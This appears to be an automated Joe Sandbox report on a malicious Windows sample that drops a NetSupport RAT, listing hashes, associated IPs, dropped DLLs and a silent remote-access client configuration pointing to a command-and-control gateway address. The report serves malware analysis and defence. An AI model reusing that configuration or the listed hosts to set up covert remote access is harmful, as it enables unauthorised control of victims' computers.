                                                            http://%s/fakeurl.htmbild.exe, bild.exe, 00000002.00000002.3890657665.000000006E0C0000.00000002.00000001.01000000.0000000E.sdmp, HTCTL32.DLL.0.drfalse
                                                              unknown
                                                              • No. of IPs < 25%
                                                              • 25% < No. of IPs < 50%
                                                              • 50% < No. of IPs < 75%
                                                              • 75% < No. of IPs
                                                              IPDomainCountryFlagASNASN NameMalicious
                                                              172.67.68.212
                                                              geo.netsupportsoftware.comUnited States
                                                              13335CLOUDFLARENETUSfalse
                                                              172.86.117.97
                                                              unknownUnited States
                                                              46261QUICKPACKETUStrue
                                                              Joe Sandbox version:41.0.0 Charoite
                                                              Analysis ID:1546257
                                                              Start date and time:2024-10-31 17:04:54 +01:00
                                                              Joe Sandbox product:CloudBasic
                                                              Overall analysis duration:0h 8m 0s
                                                              Hypervisor based Inspection enabled:false
                                                              Report type:full
                                                              Cookbook file name:default.jbs
                                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                              Run name:Run with higher sleep bypass
                                                              Number of analysed new started processes analysed:5
                                                              Number of new started drivers analysed:0
                                                              Number of existing processes analysed:0
                                                              Number of existing drivers analysed:0
                                                              Number of injected processes analysed:0
                                                              Technologies:
                                                              • HCA enabled
                                                              • EGA enabled
                                                              • AMSI enabled
                                                              Analysis Mode:default
                                                              Sample name:file.exe
                                                              Detection:MAL
                                                              Classification:mal84.rans.evad.winEXE@3/12@1/2
                                                              EGA Information:
                                                              • Successful, ratio: 100%
                                                              HCA Information:
                                                              • Successful, ratio: 83%
                                                              • Number of executed functions: 172
                                                              • Number of non-executed functions: 100
                                                              Cookbook Comments:
                                                              • Found application associated with file extension: .exe
                                                              • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                                                              • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                              • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                              • Report size exceeded maximum capacity and may have missing disassembly code.
                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                                              • VT rate limit hit for: file.exe
                                                              TimeTypeDescription
                                                              12:06:16API Interceptor13250674x Sleep call for process: bild.exe modified
                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                              172.67.68.212https://inspyrehomedesign.com/Ray-verify.htmlGet hashmaliciousNetSupport RATBrowse
                                                              • geo.netsupportsoftware.com/location/loca.asp
                                                              file.exeGet hashmaliciousNetSupport RATBrowse
                                                              • geo.netsupportsoftware.com/location/loca.asp
                                                              SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exeGet hashmaliciousNetSupport RATBrowse
                                                              • geo.netsupportsoftware.com/location/loca.asp
                                                              SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exeGet hashmaliciousNetSupport RATBrowse
                                                              • geo.netsupportsoftware.com/location/loca.asp
                                                              SecuriteInfo.com.Win32.PWSX-gen.10211.1601.exeGet hashmaliciousNetSupport RATBrowse
                                                              • geo.netsupportsoftware.com/location/loca.asp
                                                              8hN4C25a0O.exeGet hashmaliciousNetSupport RATBrowse
                                                              • geo.netsupportsoftware.com/location/loca.asp
                                                              FakturaPDF.exeGet hashmaliciousNetSupport RATBrowse
                                                              • geo.netsupportsoftware.com/location/loca.asp
                                                              JbZaDxFXF3.exeGet hashmaliciousNetSupport RATBrowse
                                                              • geo.netsupportsoftware.com/location/loca.asp
                                                              file.exeGet hashmaliciousNetSupport RAT, LummaC Stealer, NetSupport DownloaderBrowse
                                                              • geo.netsupportsoftware.com/location/loca.asp
                                                              MDE_File_Sample_fb7baecc9f46e01492b4e3e6409d6c73f83a1169.zipGet hashmaliciousNetSupport RATBrowse
                                                              • geo.netsupportsoftware.com/location/loca.asp
                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                              geo.netsupportsoftware.comhttps://webdemo.biz/Get hashmaliciousNetSupport RAT, CAPTCHA ScamBrowse
                                                              • 104.26.0.231
                                                              https://inspyrehomedesign.comGet hashmaliciousNetSupport RATBrowse
                                                              • 172.67.68.212
                                                              https://inspyrehomedesign.com/Ray-verify.htmlGet hashmaliciousNetSupport RATBrowse
                                                              • 172.67.68.212
                                                              file.exeGet hashmaliciousNetSupport RATBrowse
                                                              • 172.67.68.212
                                                              file.exeGet hashmaliciousNetSupport RATBrowse
                                                              • 104.26.0.231
                                                              http://holidaybunch.comGet hashmaliciousNetSupport RATBrowse
                                                              • 104.26.1.231
                                                              NeftPaymentError_Emdtd22102024_jpg.exeGet hashmaliciousNetSupport RATBrowse
                                                              • 104.26.1.231
                                                              NeftPaymentError_Emdtd22102024_jpg.exeGet hashmaliciousNetSupport RATBrowse
                                                              • 104.26.1.231
                                                              Update.jsGet hashmaliciousNetSupport RATBrowse
                                                              • 104.26.1.231
                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                              CLOUDFLARENETUSFw Message from Kevin - Update on Coles Supply Chain Modernisation 31-10-24.emlGet hashmaliciousUnknownBrowse
                                                              • 104.18.36.155
                                                              file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, XWormBrowse
                                                              • 188.114.96.3
                                                              https://t.ly/4Nq2xGet hashmaliciousHTMLPhisher, Mamba2FABrowse
                                                              • 104.20.6.133
                                                              INVOICE ATTACHMENT.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                                              • 188.114.96.3
                                                              SilverSEAL Corporation -RFQ_RFP_FSR Proposal.pdfGet hashmaliciousPhisherBrowse
                                                              • 188.114.96.3
                                                              Y2EM7suNV5.exeGet hashmaliciousMassLogger RATBrowse
                                                              • 188.114.97.3
                                                              https://my.toruftuiov.com/a43a39c3-796e-468c-aae4-b83c862e0918Get hashmaliciousUnknownBrowse
                                                              • 104.16.79.73
                                                              RFQ Proposals ADC-24-65.exeGet hashmaliciousMassLogger RATBrowse
                                                              • 188.114.97.3
                                                              RFQ Q700mm CB St44 PN20 e=5.6 mm TSEN 10217-1 #U7edd#U7f18#U94a2#U7ba1#Uff1a200 #U7c73.exeGet hashmaliciousMassLogger RATBrowse
                                                              • 188.114.97.3
                                                              QUICKPACKETUSarm5.elfGet hashmaliciousUnknownBrowse
                                                              • 194.50.224.242
                                                              sh4.elfGet hashmaliciousMiraiBrowse
                                                              • 107.161.124.133
                                                              arm6.elfGet hashmaliciousUnknownBrowse
                                                              • 107.161.124.106
                                                              AF1cyL4cv6.vbsGet hashmaliciousAsyncRATBrowse
                                                              • 193.26.115.68
                                                              4d5ZJqq0M7.vbsGet hashmaliciousAsyncRATBrowse
                                                              • 193.26.115.68
                                                              LmJ7BFJILh.htmGet hashmaliciousUnknownBrowse
                                                              • 193.26.115.68
                                                              Compliance_Report_Final_Q3_8c3f5541a91374b5bf18ac88017a597742a1891a.htmlGet hashmaliciousHTMLPhisherBrowse
                                                              • 185.215.165.89
                                                              file.exeGet hashmaliciousUnknownBrowse
                                                              • 144.172.118.154
                                                              vEOTtk6FeG.elfGet hashmaliciousMiraiBrowse
                                                              • 69.50.231.212
                                                              No context
                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                              C:\Users\Public\Netstat\HTCTL32.DLLhttps://webdemo.biz/Get hashmaliciousNetSupport RAT, CAPTCHA ScamBrowse
                                                                https://inspyrehomedesign.comGet hashmaliciousNetSupport RATBrowse
                                                                  https://inspyrehomedesign.com/Ray-verify.htmlGet hashmaliciousNetSupport RATBrowse
                                                                    file.exeGet hashmaliciousNetSupport RATBrowse
                                                                      file.exeGet hashmaliciousNetSupport RATBrowse
                                                                        http://holidaybunch.comGet hashmaliciousNetSupport RATBrowse
                                                                          upd_8707558.msixGet hashmaliciousNetSupport RATBrowse
                                                                            information_package.exeGet hashmaliciousNetSupport RAT, NetSupport Downloader, Stealc, VidarBrowse
                                                                              Update_2762895.msixGet hashmaliciousNetSupport RATBrowse
                                                                                Process:C:\Users\user\Desktop\file.exe
                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                Category:dropped
                                                                                Size (bytes):328056
                                                                                Entropy (8bit):6.754723001562745
                                                                                Encrypted:false
                                                                                SSDEEP:6144:2ib5YbsXPKXd6ppGpwpbGf30IVFpSzyaHx3/4aY5dUilQpAf84lH0JYBAnM1OK/Y:2ib5YbsXioEgULFpSzya9/lY5SilQCfg
                                                                                MD5:2D3B207C8A48148296156E5725426C7F
                                                                                SHA1:AD464EB7CF5C19C8A443AB5B590440B32DBC618F
                                                                                SHA-256:EDFE2B923BFB5D1088DE1611401F5C35ECE91581E71503A5631647AC51F7D796
                                                                                SHA-512:55C791705993B83C9B26A8DBD545D7E149C42EE358ECECE638128EE271E85B4FDBFD6FBAE61D13533BF39AE752144E2CC2C5EDCDA955F18C37A785084DB0860C
                                                                                Malicious:false
                                                                                Yara Hits:
                                                                                • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\Public\Netstat\HTCTL32.DLL, Author: Joe Security
                                                                                Antivirus:
                                                                                • Antivirus: ReversingLabs, Detection: 3%
                                                                                Joe Sandbox View:
                                                                                • Filename: , Detection: malicious, Browse
                                                                                • Filename: , Detection: malicious, Browse
                                                                                • Filename: , Detection: malicious, Browse
                                                                                • Filename: file.exe, Detection: malicious, Browse
                                                                                • Filename: file.exe, Detection: malicious, Browse
                                                                                • Filename: , Detection: malicious, Browse
                                                                                • Filename: upd_8707558.msix, Detection: malicious, Browse
                                                                                • Filename: information_package.exe, Detection: malicious, Browse
                                                                                • Filename: Update_2762895.msix, Detection: malicious, Browse
                                                                                Reputation:moderate, very likely benign file
                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........ ...A...A...A.......A...9...A...A..gA....1..A....0.A.......A.......A.......A..Rich.A..........PE..L.....V...........!.................Z.......................................P......=G....@......................... ...k....y..x.......@...............x).......0..................................._..@............................................text............................... ..`.rdata..............................@..@.data....f.......(...v..............@....rsrc...@...........................@..@.reloc..b1.......2..................@..B........................................................................................................................................................................................................................................................................................................................................
                                                                                Process:C:\Users\user\Desktop\file.exe
                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                Category:dropped
                                                                                Size (bytes):257
                                                                                Entropy (8bit):5.119720931145611
                                                                                Encrypted:false
                                                                                SSDEEP:6:O/oPn4xRPjwx1lDKHMoEEjLgpW2MezvLdNWYpPM/ioVLa8l6i7s:XeR7wx6JjjqW2MePBPM/ioU8l6J
                                                                                MD5:7067AF414215EE4C50BFCD3EA43C84F0
                                                                                SHA1:C331D410672477844A4CA87F43A14E643C863AF9
                                                                                SHA-256:2050CC232710A2EA6A207BC78D1EAC66A4042F2EE701CDFEEE5DE3DDCDC31D12
                                                                                SHA-512:17B888087192BCEA9F56128D0950423B1807E294D1C4F953D1BF0F5BD08E5F8E35AFEEE584EBF9233BFC44E0723DB3661911415798159AC118C8A42AAF0B902F
                                                                                Malicious:false
                                                                                Reputation:moderate, very likely benign file
                                                                                Preview:1200..0x3bcb348e....; NetSupport License File...; Generated on 11:54 - 21/03/2018........[[Enforce]]....[_License]..control_only=0..expiry=..inactive=0..licensee=EVALUSION..maxslaves=5000..os2=1..product=10..serial_no=NSM165348..shrink_wrap=0..transport=0..
                                                                                Process:C:\Users\user\Desktop\file.exe
                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                Category:dropped
                                                                                Size (bytes):18808
                                                                                Entropy (8bit):6.22028391196942
                                                                                Encrypted:false
                                                                                SSDEEP:192:1ANeiOT8Z2b6SoVF6RRHaPrpF3o47jtd3hfwHjvud3hfwx7bjuh:1ANt+E2exrpxTSDuTuih
                                                                                MD5:A0B9388C5F18E27266A31F8C5765B263
                                                                                SHA1:906F7E94F841D464D4DA144F7C858FA2160E36DB
                                                                                SHA-256:313117E723DDA6EA3911FAACD23F4405003FB651C73DE8DEFF10B9EB5B4A058A
                                                                                SHA-512:6051A0B22AF135B4433474DC7C6F53FB1C06844D0A30ED596A3C6C80644DF511B023E140C4878867FA2578C79695FAC2EB303AEA87C0ECFC15A4AD264BD0B3CD
                                                                                Malicious:false
                                                                                Yara Hits:
                                                                                • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\Public\Netstat\PCICHEK.DLL, Author: Joe Security
                                                                                Antivirus:
                                                                                • Antivirus: ReversingLabs, Detection: 3%
                                                                                Reputation:moderate, very likely benign file
                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......sv..7.d.7.d.7.d.,...5.d.,...4.d.>o..0.d.7.e...d.,...3.d.,...6.d.,...6.d.,...6.d.Rich7.d.........PE..L...f..U...........!......................... ...............................`............@.........................p"..a.... ..P....@............... ..x)...P......@ ............................................... ..@............................text...$........................... ..`.rdata....... ......................@..@.data........0......................@....rsrc........@......................@..@.reloc.......P......................@..B........................................................................................................................................................................................................................................................................................................................................
                                                                                Process:C:\Users\user\Desktop\file.exe
                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                Category:dropped
                                                                                Size (bytes):3735416
                                                                                Entropy (8bit):6.525042992590476
                                                                                Encrypted:false
                                                                                SSDEEP:49152:cTXNZ+0ci2aYNT8wstdAukudJ1xTvIZamclSp+73mPu:cTXNo0cpKwstTJIkS43mm
                                                                                MD5:00587238D16012152C2E951A087F2CC9
                                                                                SHA1:C4E27A43075CE993FF6BB033360AF386B2FC58FF
                                                                                SHA-256:63AA18C32AF7144156E7EE2D5BA0FA4F5872A7DEB56894F6F96505CBC9AFE6F8
                                                                                SHA-512:637950A1F78D3F3D02C30A49A16E91CF3DFCCC59104041876789BD7FDF9224D187209547766B91404C67319E13D1606DA7CEC397315495962CBF3E2CCD5F1226
                                                                                Malicious:true
                                                                                Yara Hits:
                                                                                • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: C:\Users\Public\Netstat\PCICL32.DLL, Author: Joe Security
                                                                                • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\Public\Netstat\PCICL32.DLL, Author: Joe Security
                                                                                Antivirus:
                                                                                • Antivirus: ReversingLabs, Detection: 12%
                                                                                Reputation:moderate, very likely benign file
                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........(.t.I.'.I.'.I.'A..'.I.'...'.I.'.?#'.I.'...'.I.'.1.'.I.'.I.'.J.'.1.'.I.'.1.'.I.'..#',I.'.."'.I.'...'.I.'...'.I.'...'.I.'Rich.I.'................PE..L......V...........!......... ..............0................................9.....f-9.....................................4........`................8.x)...P7.p....@.......................P.......P..@............0..........`....................text............................... ..`.rdata.......0......................@..@.data....%..........................@....tls.........@......................@....hhshare.....P......................@....rsrc........`......................@..@.reloc..(2...P7..4....6.............@..B........................................................................................................................................................................................................
                                                                                Process:C:\Users\user\Desktop\file.exe
                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                Category:dropped
                                                                                Size (bytes):396664
                                                                                Entropy (8bit):6.809064783360712
                                                                                Encrypted:false
                                                                                SSDEEP:12288:OpwbUb48Ju0LIFZB4Qaza4yFaMHAZtJ4Yew2j/bJa+neNQ:epq7BaGIn4BbLneNQ
                                                                                MD5:EAB603D12705752E3D268D86DFF74ED4
                                                                                SHA1:01873977C871D3346D795CF7E3888685DE9F0B16
                                                                                SHA-256:6795D760CE7A955DF6C2F5A062E296128EFDB8C908908EDA4D666926980447EA
                                                                                SHA-512:77DE0D9C93CCBA967DB70B280A85A770B3D8BEA3B707B1ABB037B2826B48898FEC87924E1A6CCE218C43478E5209E9EB9781051B4C3B450BEA3CD27DBD32C7F3
                                                                                Malicious:true
                                                                                Yara Hits:
                                                                                • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\Public\Netstat\TCCTL32.DLL, Author: Joe Security
                                                                                Antivirus:
                                                                                • Antivirus: ReversingLabs, Detection: 3%
                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............z..z..z.....z.....z.....z..{.Y.z....K.z......z.....z......z.....z.Rich.z.........PE..L...Y?XV...........!................................................................'.....@.............................o...T...x....0..@...............x)...@..\E..................................`d..@...............h............................text............................... ..`.rdata../...........................@..@.data...h............|..............@....rsrc...@....0......................@..@.reloc.. F...@...H..................@..B................................................................................................................................................................................................................................................................................................................................
                                                                                Process:C:\Users\user\Desktop\file.exe
                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                Category:dropped
                                                                                Size (bytes):105848
                                                                                Entropy (8bit):4.68250265552195
                                                                                Encrypted:false
                                                                                SSDEEP:384:qTjV5+6j6Qa86Fkv2Wr120hZIqeTSGRp2TkFimMP:qHVZl6FhWr80/heT8TkFiH
                                                                                MD5:8D9709FF7D9C83BD376E01912C734F0A
                                                                                SHA1:E3C92713CE1D7EAA5E2B1FABEB06CDC0BB499294
                                                                                SHA-256:49A568F8AC11173E3A0D76CFF6BC1D4B9BDF2C35C6D8570177422F142DCFDBE3
                                                                                SHA-512:042AD89ED2E15671F5DF67766D11E1FA7ADA8241D4513E7C8F0D77B983505D63EBFB39FEFA590A2712B77D7024C04445390A8BF4999648F83DBAB6B0F04EB2EE
                                                                                Malicious:true
                                                                                Yara Hits:
                                                                                • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\Public\Netstat\bild.exe, Author: Joe Security
                                                                                Antivirus:
                                                                                • Antivirus: ReversingLabs, Detection: 29%
                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............i...i...i.......i..6....i...h...i..6...i..6..i..6....i.Rich..i.........................PE..L...T..U.....................n...... ........ ....@..................................K....@.................................< ..<....0...i...........t..x).......... ............................................... ...............................text............................... ..`.rdata..V.... ......................@..@.rsrc....i...0...j..................@..@.reloc..l............r..............@..B................................................................................................................................................................................................................................................................................................................................................................................
                                                                                Process:C:\Users\user\Desktop\file.exe
                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                Category:dropped
                                                                                Size (bytes):701
                                                                                Entropy (8bit):5.536175622432943
                                                                                Encrypted:false
                                                                                SSDEEP:12:Yrqzd+mPZGS/py6z8BlsVTXuZ7+DP981E7GXXfDWQClnmSuy7bIAlkz6:4qzEmPZly6YBlLoG1fXXfDi7bIAaz6
                                                                                MD5:A0A7B634AB8C28C9DE3A0122F7E43F98
                                                                                SHA1:676F7554B78EAC6FEFC97B40CD965B3DEDFEF4BC
                                                                                SHA-256:D28BC214691BF2B576411750BD8AE9D5B27AE66DC8E0B60C841D43C1ABBBC9E5
                                                                                SHA-512:A8378E27F139F3524A45276416DBA938CD788F6C299A29B6E241740972CB5DC1181E3F0FD908769F53751E1E3392BBC73279E01D3DEF6D322ECE6FA9842879DE
                                                                                Malicious:false
                                                                                Preview:0xf2ddf885....[Client].._present=1..DisableChatMenu=1..DisableClientConnect=1..DisableDisconnect=1..DisableLocalInventory=1..DisableReplayMenu=1..DisableRequestHelp=1..HideWhenIdle=1..Protocols=3..RADIUSSecret=dgAAAOeJWid73S6SvOyjjiTDVewA..RoomSpec=Eval..ShowUIOnConnect=0..silent=1..SKMode=1..SOS_Alt=0..SOS_LShift=0..SOS_RShift=0..SysTray=0..UnloadMirrorOnDisconnect=1..Usernames=*....[_Info]..Filename=C:\Program Files (x86)\NetSupport\NetSupport Manager\client32u.ini....[_License]..quiet=1....[Audio]..DisableAudioFilter=1....[General]..BeepUsingSpeaker=0......[HTTP]..GatewayAddress=172.86.117.97:443..gsk=EFHH;K>OBDEJ9A<I@BCB..gskmode=0..gsku=EFHH;K>OBDEJ9A<I@BCB..GSKX=EFHH;K>OBDEJ9A<I@BCB....
                                                                                Process:C:\Users\user\Desktop\file.exe
                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                Category:dropped
                                                                                Size (bytes):773968
                                                                                Entropy (8bit):6.901559811406837
                                                                                Encrypted:false
                                                                                SSDEEP:12288:nMmCy3nAgPAxN9ueqix/HEmxsvGrif8ZSy+rdQw2QRAtd74/vmYK6H3BVoe3z:MmCy3KxW3ixPEmxsvGrm8Z6r+JQPzV7z
                                                                                MD5:0E37FBFA79D349D672456923EC5FBBE3
                                                                                SHA1:4E880FC7625CCF8D9CA799D5B94CE2B1E7597335
                                                                                SHA-256:8793353461826FBD48F25EA8B835BE204B758CE7510DB2AF631B28850355BD18
                                                                                SHA-512:2BEA9BD528513A3C6A54BEAC25096EE200A4E6CCFC2A308AE9CFD1AD8738E2E2DEFD477D59DB527A048E5E9A4FE1FC1D771701DE14EF82B4DBCDC90DF0387630
                                                                                Malicious:false
                                                                                Antivirus:
                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......:.y.~...~...~...w...}...~.......eD.....eD..+...eD..J...eD......eD......eD......eD......Rich~...................PE..L......M.........."!.........................0.....x......................................@..........................H......d...(.......................P.......$L...!..8...........................hE..@............................................text...!........................... ..`.data....Z...0...N..................@....rsrc................f..............@..@.reloc..$L.......N...j..............@..B................................................................................................................................................................................................................................................................................................................................................................
                                                                                Process:C:\Users\user\Desktop\file.exe
                                                                                File Type:Windows setup INFormation
                                                                                Category:dropped
                                                                                Size (bytes):328
                                                                                Entropy (8bit):4.93007757242403
                                                                                Encrypted:false
                                                                                SSDEEP:6:a0S880EeLL6sWqYFcf8KYFEAy1JoHBIr2M2OIAXFYJKRLIkg/LH2yi9vyifjBLWh:JShNvPG1JoHBx2XFhILH4Burn
                                                                                MD5:26E28C01461F7E65C402BDF09923D435
                                                                                SHA1:1D9B5CFCC30436112A7E31D5E4624F52E845C573
                                                                                SHA-256:D96856CD944A9F1587907CACEF974C0248B7F4210F1689C1E6BCAC5FED289368
                                                                                SHA-512:C30EC66FECB0A41E91A31804BE3A8B6047FC3789306ADC106C723B3E5B166127766670C7DA38D77D3694D99A8CDDB26BC266EE21DBA60A148CDF4D6EE10D27D7
                                                                                Malicious:false
                                                                                Preview:; nskbfltr.inf..;..; NS Keyboard Filter..; ..;..; This inf file installs the WDF Framework binaries....[Version]..Signature="$Windows NT$"..Provider=NSL......;..;--- nskbfltr Coinstaller installation ------..;......[nskbfltr.NT.Wdf]..KmdfService = nskbfltr, nskbfltr_wdfsect....[nskbfltr_wdfsect]..KmdfLibraryVersion = 1.5......
                                                                                Process:C:\Users\user\Desktop\file.exe
                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                Category:dropped
                                                                                Size (bytes):33144
                                                                                Entropy (8bit):6.737780491933496
                                                                                Encrypted:false
                                                                                SSDEEP:768:FFvNhAyi5hHA448qZkSn+EgT8To1iTYiu:FCyoHA448qSSzgI2GQ
                                                                                MD5:DCDE2248D19C778A41AA165866DD52D0
                                                                                SHA1:7EC84BE84FE23F0B0093B647538737E1F19EBB03
                                                                                SHA-256:9074FD40EA6A0CAA892E6361A6A4E834C2E51E6E98D1FFCDA7A9A537594A6917
                                                                                SHA-512:C5D170D420F1AEB9BCD606A282AF6E8DA04AE45C83D07FAAACB73FF2E27F4188B09446CE508620124F6D9B447A40A23620CFB39B79F02B04BB9E513866352166
                                                                                Malicious:true
                                                                                Yara Hits:
                                                                                • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\Public\Netstat\pcicapi.dll, Author: Joe Security
                                                                                Antivirus:
                                                                                • Antivirus: ReversingLabs, Detection: 3%
                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........+-..E~..E~..E~.\.~..E~.\.~..E~...~..E~..D~..E~.\.~..E~.\.~..E~.\.~..E~.\.~..E~...~..E~.\.~..E~Rich..E~........PE..L......U...........!.....2...........<.......P...............................`............@..........................^.......W..d....@..x............X..x)...P......`Q...............................V..@............P..@............................text....1.......2.................. ..`.rdata.......P.......6..............@..@.data...,....`.......F..............@....rsrc...x....@.......H..............@..@.reloc.......P.......P..............@..B........................................................................................................................................................................................................................................................................................................................
                                                                                Process:C:\Users\user\Desktop\file.exe
                                                                                File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                Category:dropped
                                                                                Size (bytes):77224
                                                                                Entropy (8bit):6.793971095882093
                                                                                Encrypted:false
                                                                                SSDEEP:1536:zfafvTuNOwphKuyUHTqYXHhrXH4+LIyrxomee/+5IrAee/DIr3:jafLSpAFUzt0+LIyr7eR5IUeCIz
                                                                                MD5:325B65F171513086438952A152A747C4
                                                                                SHA1:A1D1C397902FF15C4929A03D582B09B35AA70FC0
                                                                                SHA-256:26DBB528C270C812423C3359FC54D13C52D459CC0E8BC9B0D192725EDA34E534
                                                                                SHA-512:6829555AB3851064C3AAD2D0C121077DB0260790B95BF087B77990A040FEBD35B8B286F1593DCCAA81B24395BD437F5ADD02037418FD5C9C8C78DC0989A9A10D
                                                                                Malicious:true
                                                                                Antivirus:
                                                                                • Antivirus: ReversingLabs, Detection: 13%
                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......g.V#...#...#...L...2...*.r.&...#...t...L.K.u...L.J.>...L.{."...L.|."...Rich#...........PE..L...c..c.....................J.......!............@.......................... ............@....................................<.......T................]..............................................@...............@............................text.............................. ..`.rdata..,%.......&..................@..@.data....-..........................@....rsrc...T...........................@..@.reloc..p...........................@..B................................................................................................................................................................................................................................................................................................................................................
                                                                                Process:C:\Users\Public\Netstat\bild.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:modified
                                                                                Size (bytes):15
                                                                                Entropy (8bit):2.7329145639793984
                                                                                Encrypted:false
                                                                                SSDEEP:3:QJgTG:QkG
                                                                                MD5:8AB0D91EF06123198FFAC30AD08A14C7
                                                                                SHA1:46D83BB84F74D8F28427314C6084CC9AFE9D1533
                                                                                SHA-256:DB50064FEE42FB57DCFD9C4269A682331246224D6108A18DB83ABD400CCECA12
                                                                                SHA-512:1AA8560708AD663C4D5D0C2199E2CE472D11748EDA18848AAA3430C6F333BB04DA65DFFF4144BFEEA3860CA30F7F832EC64FF6D5B0731AC8878050601AC7A3A3
                                                                                Malicious:false
                                                                                Preview:32.7767,-96.797
                                                                                File type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                Entropy (8bit):7.881018486516457
                                                                                TrID:
                                                                                • Win64 Executable GUI (202006/5) 92.65%
                                                                                • Win64 Executable (generic) (12005/4) 5.51%
                                                                                • Generic Win/DOS Executable (2004/3) 0.92%
                                                                                • DOS Executable Generic (2002/1) 0.92%
                                                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                File name:file.exe
                                                                                File size:2'283'549 bytes
                                                                                MD5:87514bcfa421057dc1575ec1630d78ff
                                                                                SHA1:012029171ff901f1cb5495059da47143d193923c
                                                                                SHA256:50c263fc02412062ca239e7419880678f797408a243d0a2140bc7bbb96a716c1
                                                                                SHA512:0d37d146960abf699a35d8c66d4af38c68af12db62d8548457dc26f6a2e30dd07c3d2599f38befee0720e649b08884daa37961b74ff4e2622840ea3d8237501b
                                                                                SSDEEP:49152:kDjlabwz9Tvaw2EheBgtpsDf5Log8nUQkFG4tP5Deqk+H1Zf8NNbTs:0qwFvcEhQGa178UnxBkk1ZfWC
                                                                                TLSH:72B51209E3E909F5D0B7E53CCA668D02F77A7C5903309A8F23B4525A1F673A09E39761
                                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......$.2.`.\.`.\.`.\..y..h.\..y....\..y..m.\.....b.\...X.r.\..._.j.\...Y.Y.\.i...i.\.i...b.\.i...g.\.`.].C.\...Y.R.\...\.a.\.....a.\
                                                                                Icon Hash:1515d4d4442f2d2d
                                                                                Entrypoint:0x140032ee0
                                                                                Entrypoint Section:.text
                                                                                Digitally signed:false
                                                                                Imagebase:0x140000000
                                                                                Subsystem:windows gui
                                                                                Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                                DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                                                                Time Stamp:0x66409723 [Sun May 12 10:17:07 2024 UTC]
                                                                                TLS Callbacks:
                                                                                CLR (.Net) Version:
                                                                                OS Version Major:5
                                                                                OS Version Minor:2
                                                                                File Version Major:5
                                                                                File Version Minor:2
                                                                                Subsystem Version Major:5
                                                                                Subsystem Version Minor:2
                                                                                Import Hash:b1c5b1beabd90d9fdabd1df0779ea832
                                                                                Instruction
                                                                                dec eax
                                                                                sub esp, 28h
                                                                                call 00007F5E2CE1A1F8h
                                                                                dec eax
                                                                                add esp, 28h
                                                                                jmp 00007F5E2CE19B8Fh
                                                                                int3
                                                                                int3
                                                                                dec eax
                                                                                mov eax, esp
                                                                                dec eax
                                                                                mov dword ptr [eax+08h], ebx
                                                                                dec eax
                                                                                mov dword ptr [eax+10h], ebp
                                                                                dec eax
                                                                                mov dword ptr [eax+18h], esi
                                                                                dec eax
                                                                                mov dword ptr [eax+20h], edi
                                                                                inc ecx
                                                                                push esi
                                                                                dec eax
                                                                                sub esp, 20h
                                                                                dec ebp
                                                                                mov edx, dword ptr [ecx+38h]
                                                                                dec eax
                                                                                mov esi, edx
                                                                                dec ebp
                                                                                mov esi, eax
                                                                                dec eax
                                                                                mov ebp, ecx
                                                                                dec ecx
                                                                                mov edx, ecx
